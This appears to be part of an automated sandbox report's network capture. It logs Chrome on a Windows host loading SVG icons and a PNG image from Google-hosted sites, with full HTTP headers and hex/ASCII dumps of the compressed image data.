                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: df 64 8b 86 4d 38 80 be da 14 57 43 f4 63 27 28 b9 ea e3 f5 ee 9d fb 16 10 28 ff 3d fa 28 cb 75 8c 52 e9 de 3c 41 c5 79 de 78 3a 66 a4 d3 27 ca 6d ae bd 46 d1 de 93 c4 f8 87 01 28 df f0 e0 e4 07 55 38 2f c2 b7 7e e8 80 14 5f 91 d6 07 c3 af ca f5 ab ba 50 20 17 df e2 2a cb b9 87 ed 00 80 79 2b 5d d5 2f 19 61 2e ee 66 4a 1f 88 98 33 f8 d4 f9 5b dd 26 9d ac 31 57 6c 65 a3 ea 6d 0d 97 df e8 a1 3b 5c e5 de b2 b1 41 0b 9e f7 ba a5 e8 d6 2c 9c b5 89 3f 78 63 03 79 f0 91 0e e7 15 e7 24 75 7c d0 8b 43 04 a5 cb f3 c4 67 1e a3 e3 94 a2 29 a1 08 12 8e 18 34 7f 37 8e a7 b5 de f3 04 e0 7b ea 4d c4 2e b0 7b 63 06 03 bf df c6 61 52 ce 15 28 a0 52 de e0 f8 a4 13 92 5b bc 39 29 a8 95 2f 07 51 37 0c 2a ae 4c ad e2 1a a7 9f dd 34 94 3e 87 72 96 81 1c bb 61 72 f1 83 15 3a e3
                                                                                                                                                                                                                                                                                          Data Ascii: dM8WCc'((=(uR<Ayx:f'mF(U8/~_P *y+]/a.fJ3[&1Wlem;\A,?xcy$u|Cg)47{M.{caR(R[9)/Q7*L4>rar:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 0b 2c d3 2e fb e3 b0 51 d0 3a d9 2c d3 20 7b 0e 9d 38 f2 69 a4 e0 64 37 46 ba 9f 8c b7 5a e2 03 9e a4 b5 a4 42 73 c4 e6 bc 58 95 6c 59 43 3f 67 80 ef 88 d7 74 dd 96 bb 36 ba 86 50 72 70 68 68 6e 7d 8e ce 3d a8 30 f3 f2 4b b9 0d 9f f0 d5 95 45 60 3c 90 dd d3 c7 b0 b9 6b e6 ee 7f 50 ac 51 ae 6e 18 73 37 64 8e b8 7c 71 d7 94 ef f3 8d fa 6a b9 63 c2 aa 75 63 0d 17 e2 e3 b6 56 1d 9c 1a 47 f2 57 1f ee 93 94 db 06 1c e7 39 c4 4d 14 f9 4c 47 37 38 1b 66 f0 91 75 fc ef 28 80 c4 b5 64 1d 69 c0 01 09 8e 15 fe 06 96 40 42 21 c8 b8 d7 da f2 09 d0 5b 7d 40 de e8 6a 55 48 67 74 37 88 7a b8 a8 87 03 5f f2 4f 3c fd 2b bc 49 37 39 8e e7 65 7c ba 2a 0d 66 e2 4c 9e e3 bc 96 8a b0 9e 5b 0b 76 40 2d 8b 7f d1 9d 81 52 02 f7 ad 4e ab ee 9a 4e c3 9c 12 a4 9f c0 99 a7 5c 47 aa 93
                                                                                                                                                                                                                                                                                          Data Ascii: ,.Q:, {8id7FZBsXlYC?gt6Prphhn}=0KE`<kPQns7d|qjcucVGW9MLG78fu(di@B![}@jUHgt7z_O<+I79e|*fL[v@-RNN\G


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          109192.168.2.749886142.250.185.2414435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC767OUTGET /static/images/icons/cta-arrow-right.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.css
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: ac03d80d95cb3f7ef617a8281fc18373
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 637
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:40 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC637INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 7c 94 4b 73 9b 30 10 c7 ef f9 14 5b f5 92 cc 80 d0 03 10 ca 80 33 ad db 66 3a e3 5c fa b8 e4 e2 f1 18 c5 30 26 e0 01 c5 b8 df be 0b 06 97 26 76 74 30 da 07 bf ff 6a 57 38 be 3b 3c 17 b0 37 75 93 57 65 42 38 65 04 4c b9 ae d2 bc dc 24 e4 f7 af 6f 6e 44 ee 66 57 71 b3 df 40 9b a7 36 c3 9c 68 77 20 90 99 7c 93 59 b4 74 67 ed 73 d3 7e ae 0e 09 61 c0 80 47 c0 35 fa fe 41 39 01 94 29 9b 84 64 d6 ee 6e 3d af 6d 5b da 4a 5a d5 1b 4f 30 c6 3c c4 0f 29 b7 87 22 2f b7 e7 12 b9 d6 da eb a3 64 76 05 b8 e2 0f ae 0b f7 a6 34 f5 ca 56 f5 2d fc dc 1a bb ce 20 08 a9 84 eb 88 2b 1e de 80 0b 9d 62 83 92 4d 1f a5 eb ea 19 5c 77 00 d8 dc 16 66 96 af 97 df 4b 6b ea 72 55 2c 50 7b f9 c3 34 16 8f bf ec 0e 1a 7b c7 9c a3 60 6a 9a f5 6c 5e 9b 95 35 29
                                                                                                                                                                                                                                                                                          Data Ascii: |Ks0[3f:\0&&vt0jW8;<7uWeB8eL$onDfWq@6hw |Ytgs~aG5A9)dn=m[JZO0<)"/dv4V- +bM\wfKkrU,P{4{`jl^5)


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          110192.168.2.749887142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC543OUTGET /E3lvRhQswqrwmzhBUWdsFm6C4eoyCz-C0OaFNgCdJsbEoU-soPRlzMtUtlcqFP8zSgxTGeNY6joo9CqUiw1RSE0Imcr7wWPeIWRmo3Y=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1513444
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:47 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:47 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2273
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 31 33 3a 34 33 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:13:43
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 62 61 61 35 38 39 37 36 2d 65 39 32 36 2d 34 64 35 38 2d 61 35 39 61 2d 62 33 36 33 38 64 63 37 64 66 63 65 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 61 33 34 30 32 37 36 2d 36 65 35 35 2d 65 36 34 35 2d 38 39 38 31 2d 61 62 63 38 36 35 32 35 33 35 32 31
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:baa58976-e926-4d58-a59a-b3638dc7dfce</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:7a340276-6e55-e645-8981-abc865253521
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: ee 5d 34 c8 85 ef cf 54 81 87 0f f7 62 11 7b f0 05 7a 8f 6e bc cc 27 6f 32 1c 67 a9 16 9f e9 f9 ae fe 30 19 d3 3b df ad 3f 92 9b 1e ee aa c7 c6 fb ea ef f8 5b f5 3e e0 e0 7d 4c 9f 3e d5 1d 1f 8f 6f 94 f3 81 07 c5 84 f5 07 32 25 6f 45 f5 c5 b7 7d e8 85 fd d9 59 79 f2 4f 57 78 15 3b ab 4b 16 fe 7f 5f 39 5d cf 56 95 bd bf ef c3 3f e2 4f f9 fb fc c9 a7 06 4c 74 dc a7 76 77 c5 aa 39 c1 95 3f b2 be bf 3c ee 73 d5 67 42 f1 3f aa b8 6b 4f ce 87 77 21 68 ab a8 e3 27 7d 1e f5 39 72 d2 86 1e fd 10 de bb 77 e1 49 f1 c0 af fe f0 ae 40 c3 75 df 91 b3 78 23 86 3f 98 8f 1d b9 49 f4 ee be 76 95 bd 4b fe fb 64 64 3b 7c cd 5f c2 75 1f 0e 7d f1 61 82 7d b8 7f 55 e5 eb ea 3f 5c de 64 ef b7 c9 bd be 5c 3f a5 83 b7 af 5e 5d 7e f9 e5 c7 cb ab d7 bf 5c 5e fc f2 f3 e5 87 1f be bf
                                                                                                                                                                                                                                                                                          Data Ascii: ]4Tb{zn'o2g0;?[>}L>o2%oE}YyOWx;K_9]V?OLtvw9?<sgB?kOw!h'}9rwI@ux#?IvKdd;|_u}a}U?\d\?^]~\^
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 9f 76 1f c4 31 c4 70 30 fe 8f ee 37 e7 aa 80 ef 70 84 8d cf 93 e9 7e 7d 5e 5f 5b 3f 6c be b3 86 b5 27 e3 bb e4 3b d7 07 c5 ec 04 26 57 c5 f3 c7 cd 9d d3 6d 6e 93 1c fc e2 aa f7 fc 21 f1 8e 3f c5 0f 7b de 15 0f e8 b6 1e 72 65 b6 c2 6c bf f9 20 9e da c4 63 65 5c 68 db 31 9a a2 c9 3b 5f a8 02 0f b5 0c f6 c4 c3 cd 65 6b 74 e6 98 d7 b6 d7 dd 87 1a 7f a8 0f 20 cb 86 6b eb b8 71 78 d7 27 4a f2 2f 3e c8 f7 74 dc f7 31 7c 38 3a bc e2 9f 46 6d 67 8e 70 ce b0 c7 85 36 8f 24 67 05 8f af f3 88 03 7d be d7 37 d8 f3 b3 0d af 62 6d 5e d4 9e 5e e3 29 fd be 7b 5f cc 8b ac f9 02 9e f8 da e6 83 c5 d6 fb 77 e2 e1 19 cf 5c 23 68 57 75 6d 8e af f3 73 ba 78 1c 4f e2 02 7e 36 a7 6f 7e d0 60 31 fb 3e 78 d8 d8 19 2d ba 1e bf c5 fa 47 0f ea cf fd bd ab fd 91 8f 8e e3 89 5f cf fe cd
                                                                                                                                                                                                                                                                                          Data Ascii: v1p07p~}^_[?l';&Wmn!?{rel ce\h1;_ekt kqx'J/>t1|8:Fmgp6$g}7bm^^){_w\#hWumsxO~6o~`1>x-G_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: e3 e9 ad c4 c7 1b 65 f7 5d e8 c7 d3 6d 32 c8 bf 68 31 78 7a 91 30 c3 3b 3f a3 57 3a a1 1d 89 d1 b7 5d 28 95 23 68 d2 ac bf 9c b8 23 ce bd 4e bf ef b3 11 ff 59 92 37 2a 12 05 fa 95 71 4e b9 f1 f7 8c 39 b5 e4 04 a3 4a 87 67 ec e2 11 0f 24 f4 70 1d 2f 26 ca 12 d4 95 96 04 2b 41 16 2f 4f f8 c1 15 fe d1 a3 67 e9 59 f2 ef 6d 31 31 74 f5 ab 0f 26 d7 3b b9 f2 5e b1 a4 60 c8 6a d6 c5 41 73 29 ba 2a 17 72 26 c3 cd 46 f9 d1 eb 92 c2 bb 89 c3 27 a2 25 39 22 a9 49 46 dd 53 02 88 6f d5 3a 7a 5d 88 74 ec 22 76 09 d2 f8 72 bc 1b 88 e1 7a 14 1f 6f 4b 16 49 ca be c9 0e af b3 3d 39 02 58 9f 79 92 4f dc a5 0f 70 62 81 3e a6 1a 5f 2e 2e 16 ab 92 5f 42 77 71 0f 1f 64 d6 ed 02 70 f1 82 b7 b7 0d fe 69 b4 bf b6 ea 37 b6 d4 97 9f 74 45 fa 16 8f ec 59 32 f2 c3 3b e3 0a 1b f0 7b fd
                                                                                                                                                                                                                                                                                          Data Ascii: e]m2h1xz0;?W:](#h#NY7*qN9Jg$p/&+A/OgYm11t&;^`jAs)*r&F'%9"IFSo:z]t"vrzoKI=9XyOpb>_.._Bwqdpi7tEY2;{
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6a ac fd 15 c1 7c 37 5e e6 f3 57 39 de 99 30 d7 7e fa af a1 c9 ba 4d 1b 89 f4 dd 43 48 87 c3 89 e7 f0 1d 5d 57 36 7d 1c 49 4e df 49 fe 33 6b 49 2c fd b6 7e b2 3e 7b fc 63 88 8f b2 a3 19 a2 ea b1 b6 f8 34 3d 1c fd 1c 38 78 3b 0f 0e e8 a7 8d ec f1 b6 81 e6 f4 57 b4 3f fe 75 7c fc 33 a8 d9 fa b4 3c 41 25 28 f6 4e 2a 96 62 0f be b9 60 37 7b 9f 20 86 15 76 1e 8b a3 7d e8 30 06 0e 67 0a 36 1d ae ce 1d e6 b7 40 e9 f6 04 b2 c3 27 60 89 99 6d f5 9f 20 a7 db 13 60 0d 7d e9 c0 6a 5d 81 30 7c 70 74 78 68 9c 56 9a 44 43 5b f1 83 7c a7 02 2c 69 f4 b1 b3 3f b2 ac 5f a9 54 3a e6 0e c2 1d 2b 1e 95 43 03 67 06 46 09 8d 83 96 2f 04 41 56 3e 52 fb 1b ee 9b 1d 0e 2f 9f 7c f0 e0 8d 76 f1 18 2e 09 99 93 54 43 43 a2 cb 85 f4 8d 6a bc 86 53 12 82 fd 77 f1 e8 10 9f 93 f1 e8 00 33
                                                                                                                                                                                                                                                                                          Data Ascii: j|7^W90~MCH]W6}INI3kI,~>{c4=8x;W?u|3<A%(N*b`7{ v}0g6@'`m `}j]0|ptxhVDC[|,i?_T:+CgF/AV>R/|v.TCCjSw3
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: a1 7f 6d d8 79 36 cb be e2 37 9b ef ba 0b 75 a8 f8 5e 7f ec 7f 16 0a 04 1b 72 ab 6a 17 63 90 4f a6 05 d1 31 43 44 7d b0 7a e7 fd 93 90 4d c7 5f 78 e1 71 3c bb 46 46 f3 0a 10 8b 0e 9e 6d f4 dc ae f3 dd c0 b9 b5 c7 27 bd 05 ab 0e df 83 5b 9b cf be 6e 68 3e 2b 72 38 fc 57 ff d8 75 59 70 fa dd c8 37 66 e8 e3 37 1e e8 c1 b8 28 8e d1 dd ae 67 ae f8 c8 73 23 41 3f 6e 64 50 c4 6e 68 61 a9 ca ad 4a 83 ff aa 77 32 df 85 df 5c ee 5d e3 e4 fa 12 b1 93 85 0e e0 09 ba 8f 79 47 0d 43 b2 b1 31 c3 ab f1 11 3b d8 c9 78 3c f8 d3 30 d0 d3 a7 35 c3 e7 c1 90 7e d8 36 c8 ba ca e8 b8 11 7f 6e 0c c2 73 60 a9 50 9f 15 57 cf 35 1b 7b 47 1e c0 a4 3c 3a 9f 03 92 25 fd 1d 6e f4 a0 e3 db e3 6d 4a d4 06 2d 3e 80 32 48 73 d5 33 67 12 98 76 5e c5 fb ee 88 4a 36 a1 cf 9c 9a 6f 6c 42 5c ef
                                                                                                                                                                                                                                                                                          Data Ascii: my67u^rjcO1CD}zM_xq<FFm'[nh>+r8WuYp7f7(gs#A?ndPnhaJw2\]yGC1;x<05~6ns`PW5{G<:%nmJ->2Hs3gv^J6olB\
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 3f 6a e5 27 ec 56 40 2a 17 cf f4 8d 93 f0 80 df 2a cd 2f 4a 1c f5 e8 f6 18 52 16 bf 25 87 30 c9 5d d0 79 52 a2 f0 b4 3d ab e5 d6 0d ab 24 8f c7 90 f7 08 18 fd 26 8b 95 77 8f 4b 42 3f aa 5c 82 71 ab d7 ea 3f 8b e5 09 4a b7 1b 33 12 c6 1c 6a 17 36 04 4b c6 e9 20 18 78 8d eb 78 5a bc ab 5e f2 7c 09 39 ca 0b dc 38 57 a3 9a 25 7f 8f ee 57 30 9b 9a 2f 44 62 7e b5 fa 62 a0 84 8f c4 fa 1e ab aa 0e 0a 7e 47 0f 8f 25 d2 c4 82 70 c1 f1 2e bb ef 69 0e 4a 6d 2b 3a 56 75 3d 0e 37 7d 88 25 fa 84 15 96 ce c9 7f 26 ce fa e3 d5 0f f1 78 b5 e7 1e d5 96 4c 0b 3f 8c fc ee 71 7a 67 9f dd f8 d2 1b 29 75 73 15 bc 9d f1 58 5c d4 68 b1 4b c2 b1 ed 6d 7e 7f 1f 8f fa be 38 0d df e3 92 b2 7b 54 2a 5e 9f 3c 3d 8f 00 bf 0f e6 36 06 d0 c7 bb ad 6c ed 71 fc 2f bf 48 d2 0f ad b4 fd 65 f6
                                                                                                                                                                                                                                                                                          Data Ascii: ?j'V@**/JR%0]yR=$&wKB?\q?J3j6K xxZ^|98W%W0/Db~b~G%p.iJm+:Vu=7}%&xL?qzg)usX\hKm~8{T*^<=6lq/He
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 70 47 94 78 be 9a 0e bd 13 c8 e2 3b 9e d9 d4 ea b0 83 23 3c f9 26 c6 4e db 83 6f df d3 0d fd 1d 3f 5b e8 ef f8 ac 3e 3a 78 34 24 df 5d 34 16 34 05 4c f0 63 32 79 b2 9b 95 1c 87 e7 20 d1 ef c4 00 8f c1 62 ed da 8f 27 32 45 78 17 8f 2b 5f ab 70 d0 f9 79 7c e9 24 56 4e 50 de e4 26 7c ee 26 e8 ec e3 13 cf b3 8b 3e c2 02 ec cd 16 24 ba 7d 80 1c dd ea eb fa d2 7c 41 fd f8 a3 fb 63 8d ed 05 ba 63 de 70 e0 de 80 74 96 a0 f3 09 f2 0f fa ca a3 33 9d e7 4c be e2 55 93 05 59 3a 47 d7 39 9b 04 43 ce ea 0f 1e 53 21 fc 34 d0 6a 13 df ce e0 e1 2e fc f0 58 5f 5f e3 71 49 75 33 78 0d 1c d2 93 60 c9 b6 f7 fc b8 f2 47 11 38 65 b1 55 bd c4 c3 ec 90 70 1f e3 4e f2 f1 a5 25 01 c3 4c 2f 0f f5 41 71 cb 3b fc fa 9b 6d e2 3b 96 2a ae 3c 5d d1 57 2d 3f ee 8f 0f 1c bc 03 9c dc a7 cd
                                                                                                                                                                                                                                                                                          Data Ascii: pGx;#<&No?[>:x4$]44Lc2y b'2Ex+_py|$VNP&|&>$}|Accpt3LUY:G9CS!4j.X__qIu3x`G8eUpN%L/Aq;m;*<]W-?


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          111192.168.2.749890142.250.185.2414435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC772OUTGET /static/images/icons/carousel-arrow-right.svg HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: recovertogether.withgoogle.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/static/css/main-33fc50c967458a1089de4ee9d5e91b3b69156332772c732356503e6ca6006d7e.min.css
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: language-choice=x-default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 07c9ee2075f2392b620f27382524afa9
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 413
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:42 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:41 UTC413INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 6c 52 4d 6f 9c 30 10 bd e7 57 4c a7 97 44 aa 6d 6c a0 81 15 10 a9 95 da 7b d3 9e 2b b2 38 60 ad d7 46 b6 b3 6c fe 7d cd 57 1b 45 9d d3 8c df e3 bd f9 a0 7a b8 9e 35 5c a4 f3 ca 9a 1a 39 4d 10 a4 39 da 4e 99 be c6 5f 3f bf 91 02 1f 9a 9b ca 5f 7a 98 54 17 86 c8 49 c7 2b c2 20 55 3f 84 1a 45 32 57 17 25 a7 2f f6 5a 63 02 09 f0 14 44 94 79 23 ca 11 a2 8d f1 35 0e 21 8c 07 c6 a6 69 a2 53 4a ad eb 99 48 92 84 45 f9 8d 72 b8 6a 65 4e ff 23 f2 b2 2c d9 82 62 73 03 31 aa 0f 84 c0 77 69 a4 6b 83 75 07 78 3c c9 70 1c 20 cf a9 80 db fb 82 17 fc 0e 08 cc 8e 3e 5a fa 05 6d c7 91 1e ed 19 08 d9 34 82 0a 5a 36 ad 73 76 aa d8 5a ac e2 9d f4 c7 e6 ab 93 6d 90 5d 1c 3d 0c 9b 3e ad d8 02 ad ac 1e 54 57 e3 e3 eb f9 c9 6a 8f e0 83 b3 27 59 a3 b1
                                                                                                                                                                                                                                                                                          Data Ascii: lRMo0WLDml{+8`Fl}WEz5\9M9N_?_zTI+ U?E2W%/ZcDy#5!iSJHErjeN#,bs1wikux<p >Zm4Z6svZm]=>TWj'Y


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
